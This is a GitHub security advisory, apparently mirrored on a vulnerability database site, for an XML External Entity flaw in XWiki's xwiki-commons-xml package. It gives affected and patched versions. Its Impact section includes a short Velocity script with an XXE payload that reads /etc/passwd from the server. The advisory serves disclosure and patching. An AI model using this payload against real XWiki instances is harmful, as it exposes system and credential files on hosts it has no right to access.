Loading HuntDB...

GHSA-m2r5-4w96-qxg5

GitHub Security Advisory

Arbitrary file access through XML parsing in org.xwiki.commons:xwiki-commons-xml

✓ GitHub Reviewed MODERATE Has CVE

Advisory Details

### Impact

It's possible in a script to access any file accessing to the user running XWiki application server with XML External Entity Injection through the XML script service.

For example:

```
{{velocity}}
#set($xml=$services.get('xml'))
#set($xxe_payload = "<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root[<!ENTITY xxe SYSTEM 'file:///etc/passwd' >]><root><foo>&xxe;</foo></root>")
#set($doc=$xml.parse($xxe_payload))
$xml.serialize($doc)
{{/velocity}}
```

### Patches

The problem has been patched on versions 12.10.10, 13.4.4 and 13.8RC1.

### Workarounds

There's no easy workaround for fixing this vulnerability other than upgrading and being careful when giving Script rights.

### References

https://jira.xwiki.org/browse/XWIKI-18946

### For more information

If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki](https://jira.xwiki.org)
* Email us at [XWiki Security mailing-list](mailto:[email protected])

Affected Packages

Maven org.xwiki.commons:xwiki-commons-xml
Affected versions: 2.7 (fixed in 12.10.10)
Maven org.xwiki.commons:xwiki-commons-xml
Affected versions: 13.0.0 (fixed in 13.4.4)
Maven org.xwiki.commons:xwiki-commons-xml
Affected versions: 13.5-rc-1 (fixed in 13.8-rc-1)

Related CVEs

Key Information

GHSA ID
GHSA-m2r5-4w96-qxg5
Published
April 28, 2022 7:31 PM
Last Modified
April 28, 2022 7:31 PM
CVSS Score
5.0 /10
Primary Ecosystem
Maven
Primary Package
org.xwiki.commons:xwiki-commons-xml
GitHub Reviewed
✓ Yes

Dataset

Last updated: July 28, 2025 6:37 AM

Data from GitHub Advisory Database. This information is provided for research and educational purposes.